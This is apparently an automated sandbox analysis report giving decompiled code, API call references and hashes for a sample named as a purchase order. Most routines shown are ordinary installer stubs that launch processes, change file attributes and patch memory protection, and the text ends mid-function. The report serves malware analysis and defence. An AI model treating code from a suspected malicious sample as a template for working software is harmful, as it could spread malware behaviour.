                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t14 - 4));
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x00401749
                                                                                      0x0040174f
                                                                                      0x00401751
                                                                                      0x004028fc
                                                                                      0x00402903
                                                                                      0x00402903
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      • Opcode ID: ba1aa4db5ad6b1f18ee88ff5d2f1afd4f8bab62d038d97b8ecfeb07e8d8821a1
                                                                                      • Instruction ID: 6450ab0b933f3cc6d02a21ebc76c27f69b4627690f11a38bac6dda038a0a621d
                                                                                      • Opcode Fuzzy Hash: ba1aa4db5ad6b1f18ee88ff5d2f1afd4f8bab62d038d97b8ecfeb07e8d8821a1
                                                                                      • Instruction Fuzzy Hash: 87E08072304105EBE740DB64DE49FAE7368DF40358F204637E511E51D1E6B49945972D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                      
                                                                                      				 *0x715d5048 = _a4;
                                                                                      				if(_a8 == 1) {
                                                                                      					VirtualProtect(0x715d505c, 4, 0x40, 0x715d504c); // executed
                                                                                      					 *0x715d505c = 0xc2;
                                                                                      					 *0x715d504c = 0;
                                                                                      					 *0x715d5054 = 0;
                                                                                      					 *0x715d5068 = 0;
                                                                                      					 *0x715d5058 = 0;
                                                                                      					 *0x715d5050 = 0;
                                                                                      					 *0x715d5060 = 0;
                                                                                      					 *0x715d505e = 0;
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}



                                                                                      0x715d2a88
                                                                                      0x715d2a8d
                                                                                      0x715d2a9d
                                                                                      0x715d2aa5
                                                                                      0x715d2aac
                                                                                      0x715d2ab1
                                                                                      0x715d2ab6
                                                                                      0x715d2abb
                                                                                      0x715d2ac0
                                                                                      0x715d2ac5
                                                                                      0x715d2aca
                                                                                      0x715d2aca
                                                                                      0x715d2ad2

                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(715D505C,00000004,00000040,715D504C), ref: 715D2A9D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 289aa559592ccbd6cdf92c24138ba3b33179ac41559fce6c2e00e9a4517aff36
                                                                                      • Instruction ID: 83d166921bbafa28e682228241325d2a0502543fdfe3b7f746964c0e0ed04cc6
                                                                                      • Opcode Fuzzy Hash: 289aa559592ccbd6cdf92c24138ba3b33179ac41559fce6c2e00e9a4517aff36
                                                                                      • Instruction Fuzzy Hash: A1F052B2A68380DEC35ACF3B84C47093FF0BB59315B76856AE6ECDA245E3744448DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004015A3() {
                                                                                      				int _t5;
                                                                                      				void* _t11;
                                                                                      				int _t14;
                                                                                      
                                                                                      				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                      				_t14 = _t5;
                                                                                      				if(_t14 == 0) {
                                                                                      					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
                                                                                      				return 0;
                                                                                      			}






                                                                                      0x004015ae
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 5e7abc62731d2f8694de3c741be73374dbfaa841e021d9f69aa12115b5a4590b
                                                                                      • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                                                      • Opcode Fuzzy Hash: 5e7abc62731d2f8694de3c741be73374dbfaa841e021d9f69aa12115b5a4590b
                                                                                      • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404610(int _a4) {
                                                                                      				struct HWND__* _t2;
                                                                                      				long _t3;
                                                                                      
                                                                                      				_t2 =  *0x429238;
                                                                                      				if(_t2 != 0) {
                                                                                      					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                      					return _t3;
                                                                                      				}
                                                                                      				return _t2;
                                                                                      			}





                                                                                      0x00404610
                                                                                      0x00404617
                                                                                      0x00404622
                                                                                      0x00000000
                                                                                      0x00404622
                                                                                      0x00404628

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                      • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                                                      • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                      • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004035F8(long _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x00403606
                                                                                      0x0040360c

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004045F9(int _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x00404607
                                                                                      0x0040460d

                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                      • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                      • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                      • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004045E6(int _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = EnableWindow( *0x423744, _a4); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x004045f0
                                                                                      0x004045f6

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                      • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                                      • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                                      • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00401FA4(void* __ecx) {
                                                                                      				void* _t9;
                                                                                      				char _t13;
                                                                                      				void* _t15;
                                                                                      				void* _t17;
                                                                                      				void* _t20;
                                                                                      				void* _t22;
                                                                                      
                                                                                      				_t17 = __ecx;
                                                                                      				_t19 = E00402DA6(_t15);
                                                                                      				E004056CA(0xffffffeb, _t7); // executed
                                                                                      				_t9 = E00405C4B(_t19); // executed
                                                                                      				_t20 = _t9;
                                                                                      				if(_t20 == _t15) {
                                                                                      					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                      				} else {
                                                                                      					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                      						_t13 = E00406AE0(_t17, _t20);
                                                                                      						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                      							if(_t13 != _t15) {
                                                                                      								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                      							}
                                                                                      						} else {
                                                                                      							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                      						}
                                                                                      					}
                                                                                      					_push(_t20);
                                                                                      					CloseHandle();
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                                                      				return 0;
                                                                                      			}









                                                                                      0x00401fa4
                                                                                      0x00401faa
                                                                                      0x00401faf
                                                                                      0x00401fb5
                                                                                      0x00401fba
                                                                                      0x00401fbe
                                                                                      0x0040292e
                                                                                      0x00401fc4
                                                                                      0x00401fc7
                                                                                      0x00401fca
                                                                                      0x00401fd2
                                                                                      0x00401fe1
                                                                                      0x00401fe3
                                                                                      0x00401fe3
                                                                                      0x00401fd4
                                                                                      0x00401fd8
                                                                                      0x00401fd8
                                                                                      0x00401fd2
                                                                                      0x00401fea
                                                                                      0x00401feb
                                                                                      0x00401feb
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                        • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000,00000000), ref: 00405C74
                                                                                        • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                        • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                        • Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B13
                                                                                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2972824698-0
                                                                                      • Opcode ID: eac8d3d04f2c256a0215bdc6c22daf55937fea7c70be27f4f511c72f92d54a07
                                                                                      • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                      • Opcode Fuzzy Hash: eac8d3d04f2c256a0215bdc6c22daf55937fea7c70be27f4f511c72f92d54a07
                                                                                      • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004014D7(intOrPtr __edx) {
                                                                                      				long _t3;
                                                                                      				void* _t7;
                                                                                      				intOrPtr _t10;
                                                                                      				void* _t13;
                                                                                      
                                                                                      				_t10 = __edx;
                                                                                      				_t3 = E00402D84(_t7);
                                                                                      				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                                      				if(_t3 <= 1) {
                                                                                      					_t3 = 1;
                                                                                      				}
                                                                                      				Sleep(_t3); // executed
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
                                                                                      				return 0;
                                                                                      			}







                                                                                      0x004014d7
                                                                                      0x004014d8
                                                                                      0x004014e1
                                                                                      0x004014e4
                                                                                      0x004014e8
                                                                                      0x004014e8
                                                                                      0x004014ea
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: b1c326c608d934edba5287c2ab9886205131f3591e80fc453df13221f151a9a0
                                                                                      • Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
                                                                                      • Opcode Fuzzy Hash: b1c326c608d934edba5287c2ab9886205131f3591e80fc453df13221f151a9a0
                                                                                      • Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 16%
                                                                                      			E715D101B(signed int _a4) {
                                                                                      				signed int _t2;
                                                                                      				void* _t4;
                                                                                      
                                                                                      				_t2 = E715D15B6();
                                                                                      				if(_t2 != 0) {
                                                                                      					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
                                                                                      					_push(_t4);
                                                                                      				} else {
                                                                                      					_push(_t2);
                                                                                      				}
                                                                                      				return E715D15DD();
                                                                                      			}





                                                                                      0x715d101b
                                                                                      0x715d1022
                                                                                      0x715d102f
                                                                                      0x715d1035
                                                                                      0x715d1024
                                                                                      0x715d1024
                                                                                      0x715d1024
                                                                                      0x715d103c

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,715D1019,00000001), ref: 715D102F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 16b117a2643fdbd776e9b41f673d6a7d51ba32a90842aa68569c26d9349b3e42
                                                                                      • Instruction ID: 8fecbf1bbb3ea6fe3f7f689ef0c7e7417ead80a0182ea407d32905794b1efa80
                                                                                      • Opcode Fuzzy Hash: 16b117a2643fdbd776e9b41f673d6a7d51ba32a90842aa68569c26d9349b3e42
                                                                                      • Instruction Fuzzy Hash: 57C08CA2208242BBD20DAEB94AC5F1A229C8B88192F500802F6C3C84C0DA28D2000F31
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E715D12BB() {
                                                                                      				void* _t3;
                                                                                      
                                                                                      				_t3 = GlobalAlloc(0x40,  *0x715d506c +  *0x715d506c); // executed
                                                                                      				return _t3;
                                                                                      			}




                                                                                      0x715d12c5
                                                                                      0x715d12cb

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,715D12DB,?,715D137F,00000019,715D11CA,-000000A0), ref: 715D12C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: 120e451ebe6f737d594124840d1d40eddada8c5d4515a1f61b4d834eb26a314f
                                                                                      • Instruction ID: a9da1c38c819b0a70ea913069a3d32225a194d18cd4dbf66c28208f66f35af5e
                                                                                      • Opcode Fuzzy Hash: 120e451ebe6f737d594124840d1d40eddada8c5d4515a1f61b4d834eb26a314f
                                                                                      • Instruction Fuzzy Hash: A0B01272A08000DFEF049B66CCC6F343374E700301F154040F650C4180C12058048B34
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 78%
                                                                                      			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				long _v16;
                                                                                      				long _v20;
                                                                                      				long _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				long _v36;
                                                                                      				char _v40;
                                                                                      				unsigned int _v44;
                                                                                      				signed int _v48;
                                                                                      				WCHAR* _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				intOrPtr _v64;
                                                                                      				intOrPtr _v68;
                                                                                      				WCHAR* _v72;
                                                                                      				void _v76;
                                                                                      				struct HWND__* _v80;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t82;
                                                                                      				long _t87;
                                                                                      				short* _t89;
                                                                                      				void* _t95;
                                                                                      				signed int _t96;
                                                                                      				int _t109;
                                                                                      				signed short _t114;
                                                                                      				signed int _t118;
                                                                                      				struct HWND__** _t122;
                                                                                      				intOrPtr* _t138;
                                                                                      				WCHAR* _t146;
                                                                                      				unsigned int _t150;
                                                                                      				signed int _t152;
                                                                                      				unsigned int _t156;
                                                                                      				signed int _t158;
                                                                                      				signed int* _t159;
                                                                                      				signed int* _t160;
                                                                                      				struct HWND__* _t166;
                                                                                      				struct HWND__* _t167;
                                                                                      				int _t169;
                                                                                      				unsigned int _t197;
                                                                                      
                                                                                      				_t156 = __edx;
                                                                                      				_t82 =  *0x422720;
                                                                                      				_v32 = _t82;
                                                                                      				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
